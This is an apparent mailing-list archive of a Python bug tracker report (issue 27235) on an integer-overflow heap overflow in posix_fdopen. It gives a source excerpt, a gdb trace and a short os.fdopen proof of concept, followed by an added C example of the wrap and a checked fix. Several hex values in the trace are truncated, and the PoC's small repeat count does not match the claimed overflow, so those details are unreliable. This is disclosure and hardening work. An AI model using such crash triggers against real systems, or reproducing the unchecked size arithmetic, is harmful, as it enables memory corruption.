[issue27235] Heap overflow occurred due to the int overflow (Python-2.7.11/Modules/posixmodule.c)

2016-06-05 Thread Rustemzade Mehemmed

Changes by Rustemzade Mehemmed <oke...@gmail.com>:


--
components: +Interpreter Core
versions: +Python 2.7

___
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue27235>
___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com



[issue27235] Heap overflow occurred due to the int overflow (Python-2.7.11/Modules/posixmodule.c)

2016-06-05 Thread Rustemzade Mehemmed

Changes by Rustemzade Mehemmed <oke...@gmail.com>:


--
type:  -> security




[issue27235] Heap overflow occurred due to the int overflow (Python-2.7.11/Modules/posixmodule.c)

2016-06-05 Thread Rustemzade Mehemmed

Changes by Rustemzade Mehemmed <oke...@gmail.com>:


--
title: Heap overflow occurred due to the int overflow -> Heap overflow occurred due to the int overflow (Python-2.7.11/Modules/posixmodule.c)




[issue27235] Heap overflow occurred due to the int overflow

2016-06-05 Thread Rustemzade Mehemmed

New submission from Rustemzade Mehemmed:

I have tested this vulnerability on Python 2.7 and it is absolutely affected 
:). The integer overflow is produced in the posix_fdopen function. If an attacker 
sends fdopen a mode value larger than the max integer value (2*32), an integer 
overflow occurs. 

int fd;
char *orgmode = "r";
int bufsize = -1;
FILE *fp;
PyObject *f;
char *mode;
/* fd, orgmode and bufsize are filled from the Python-level arguments */
if (!PyArg_ParseTuple(args, "i|si", &fd, &orgmode, &bufsize))
    return NULL;

/* Sanitize mode.  See fileobject.c */
/* allocation size is strlen(orgmode)+3, computed before the copy below */
mode = PyMem_MALLOC(strlen(orgmode)+3);
...
strcpy(mode, orgmode);

os.fdopen(fd[, mode[, bufsize]])

fo = os.fdopen(fd, "r"*0x)

   0x5e2595 <+86>:  mov    edi,eax
=> 0x5e2598 <+89>:  call   0x416e50 <strlen@plt> 
(gdb) print /x $eax
$1 = 0x
after the addition by the "add" instruction, the overflow occurred and => 
   0x5e259d <+94>:  add    eax,0x3
(gdb) print /x $eax
$5 = 0x2
and memory is allocated, after which the buffer is copied ==> 
   0x5e25a1 <+98>:  mov    edi,eax
   0x5e25a4 <+101>: call   0x48f793 <_PyMem_DebugMalloc>
   0x5e25cb <+140>: mov    esi,edx
   ...
   0x5e25ce <+143>: mov    edi,eax
   0x5e25d1 <+146>: call   0x416b80 <strcpy@plt>

copy buffer
strcpy(mode, orgmode); <=== overflow


poc:
#!/usr/bin/python

import os, sys

fd = os.open( "foo.txt", os.O_RDWR|os.O_CREAT )
fo = os.fdopen(fd, "r"*0xff)
print "Closed the file successfully!!"

--
messages: 267447
nosy: madness
priority: normal
severity: normal
status: open
title: Heap overflow occurred due to the int overflow

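The allocation-size arithmetic the report describes, as an added example that is not CPython's code and not the reporter's: it isolates the strlen(orgmode)+3 computation from posix_fdopen, reproduces the 32-bit wrap the gdb trace shows, and pairs it with a wrap-checked size computation and a length-bounded copy. MODE_SLACK, MAX_MODE_LEN and all function names are hypothetical.

```c
/* Added example, not CPython's code. It isolates the size computation
 * strlen(orgmode)+3 that posix_fdopen passes to PyMem_MALLOC, shows the
 * 32-bit wrap the gdb trace above displays, and shows a checked variant.
 * All function and constant names are hypothetical. */
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define MODE_SLACK   3   /* the "+3" in posix_fdopen's allocation */
#define MAX_MODE_LEN 8   /* hypothetical cap: fopen modes are a few chars */

/* The arithmetic as seen in a 32-bit register: unsigned addition wraps,
 * so a length of 0xffffffff yields an allocation size of 2. */
uint32_t mode_alloc_size_u32(uint32_t mode_len)
{
    return mode_len + MODE_SLACK;
}

/* Checked variant: refuses any length whose sum with the slack would wrap
 * in size_t. Returns 0 and stores the size in *out, or -1 on wrap. */
int mode_alloc_size_checked(size_t mode_len, size_t *out)
{
    if (mode_len > SIZE_MAX - MODE_SLACK)
        return -1;
    *out = mode_len + MODE_SLACK;
    return 0;
}

/* Hardened copy: caps the mode length up front (a valid mode is short),
 * computes the size with the wrap check, and copies exactly len+1 bytes,
 * which is within the allocation by construction. Caller frees the result.
 * Returns NULL on an over-long mode, on wrap, or on allocation failure. */
char *copy_mode_checked(const char *orgmode)
{
    size_t len = strlen(orgmode);
    size_t size;
    char *mode;

    if (len > MAX_MODE_LEN)
        return NULL;
    if (mode_alloc_size_checked(len, &size) != 0)
        return NULL;
    mode = malloc(size);
    if (mode == NULL)
        return NULL;
    memcpy(mode, orgmode, len + 1);   /* len + 1 <= size by construction */
    return mode;
}
```

Either check alone closes the undersized-allocation path; the length cap also rejects the oversized mode string before any arithmetic is done.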